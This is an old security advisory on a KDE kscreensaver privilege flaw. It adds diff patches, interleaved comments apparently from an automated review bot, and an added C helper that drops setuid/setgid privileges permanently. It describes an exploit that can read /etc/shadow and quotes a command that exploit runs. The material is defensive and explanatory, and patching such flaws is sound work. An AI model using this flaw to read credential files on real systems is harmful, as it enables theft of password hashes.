COMMAND

    kde

SYSTEMS AFFECTED

    Linux

PROBLEM

    Catalin Mitrofan found a vulnerability in KDE and posted an exploit.
    The kde packages built by Debian were affected by the kde exploit in
    this way: they were not setuid root, but setgid shadow, so it could
    be possible to read /etc/shadow, but not to get root rights.
    DO NOT USE THIS EXPLOIT WITHOUT MODIFYING IT. THE THING ATTEMPTS TO
    RUN 'ssh pentagon.usa.gov -v' IF THE EXPLOIT SUCCEEDS, ALTHOUGH THAT
    HOST DOES NOT EXIST.

SOLUTION

    Remove the setuid bit, apply the latest version if available, or at
    least apply the following patch to be safe:

    #for kde beta 3 and kde beta 4
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -206,6 +206,14 @@

     int main( int argc, char *argv[] )
     {
    +       initPasswd();
    +
    +       if (getgid() != getegid())
    +               setegid(getgid());
    +
    +       if (geteuid() != getuid())
    +               seteuid(getuid());
    +
            Window saveWin;
            int timeout = 600;
            ProgramName = argv[0];
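    Review bot: setegid()/seteuid() change only the effective IDs and leave the saved set-group-ID and set-user-ID untouched, so after this block a later seteuid(0) or setegid() back to the shadow group would still succeed; if the intent is that nothing after initPasswd() ever needs the privilege again, use `setgid(getgid()); setuid(getuid());` so the saved IDs are reset as well. The return values of both calls are also ignored; a failed drop should terminate the program rather than continue with elevated IDs. Dropping the group before the user is the correct order, and initPasswd() being the only call made while still privileged is the right shape.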
    #for kde beta 4:
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -286,11 +294,6 @@
                    }
                i++;
            }
    -
    -       initPasswd();
    -       // drop root privileges before we do anything important
    -       setuid(getuid());
    -

            if ( mode == MODE_INSTALL )
            {
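    Review bot: removing this late `initPasswd(); setuid(getuid());` is the right direction, since it ran only after the argument loop above had processed user-controlled input while still privileged, and the +8 offset in the hunk header matches the eight lines added at the top of main(). Worth checking that nothing between the start of main() and this point still relied on the effective IDs (the comment "drop root privileges before we do anything important" was the only marker of where the boundary used to be), and that the early drop in the first hunk is made permanent, because the removed setuid() was the only call here that reset the saved ID.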
    #for kde beta 3:
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -286,8 +294,6 @@
                    }
                i++;
            }
    -
    -       initPasswd();

            if ( mode == MODE_INSTALL )
            {
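    Review bot: for beta 3 only initPasswd() is removed here; there was never a setuid(getuid()) at this point, so before this patch beta 3 ran the whole program with elevated IDs. With the call moved to the top of main() the same caveat as in the first hunk applies: the drop there uses setegid()/seteuid() only, so the saved IDs remain and this hunk does not change that. Also confirm the moved initPasswd() still succeeds at its new position, since it is now the first statement executed and any initialisation it depended on must precede it.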

    This is used by klock and all *.kss files. If you have PAM,
    kscreensaver need not be setuid; the patch for that is a bit long
    (6K).
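    The fix above reduces to one rule: a setuid or setgid program does
    its single privileged action (here initPasswd()) and then drops its
    privileges permanently before touching any user-controlled input.
    The following helper is an added example, not code from the advisory
    or from KDE; it shows the permanent form of the drop (setgid()/setuid()
    rather than the patch's setegid()/seteuid(), which leave the saved
    IDs in place) and verifies that the original privilege cannot be
    regained afterwards.

```c
/* Added example (not from the advisory or KDE): permanently drop the
 * elevated group and user IDs of a setuid/setgid program, in the right
 * order, and verify that the drop cannot be undone. */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 when the effective IDs now equal the real (invoking)
 * user's IDs and the old privilege cannot be regained; -1 otherwise
 * (errno is left as set by the failing call). */
int drop_privileges_permanently(void)
{
    gid_t rgid = getgid();
    uid_t ruid = getuid();

    /* Supplementary groups can only be cleared while still root. */
    if (geteuid() == 0 && setgroups(1, &rgid) != 0)
        return -1;
    /* Group first: after setuid() to a non-root uid, setgid() would
     * no longer be permitted. */
    if (setgid(rgid) != 0)
        return -1;
    if (setuid(ruid) != 0)
        return -1;

    /* Verify the drop took effect. */
    if (getegid() != rgid || geteuid() != ruid)
        return -1;
    /* If we were not invoked by root, regaining root must now fail;
     * success here means the saved set-user-ID was left behind (the
     * seteuid() pitfall). */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    /* Call this before anything that handles user input. */
    if (drop_privileges_permanently() != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("uid=%d euid=%d gid=%d egid=%d\n", (int)getuid(),
           (int)geteuid(), (int)getgid(), (int)getegid());
    return 0;
}
```

Run as an ordinary user the program simply confirms the IDs already
match; installed setuid or setgid it performs the real drop and refuses
to continue if any step fails.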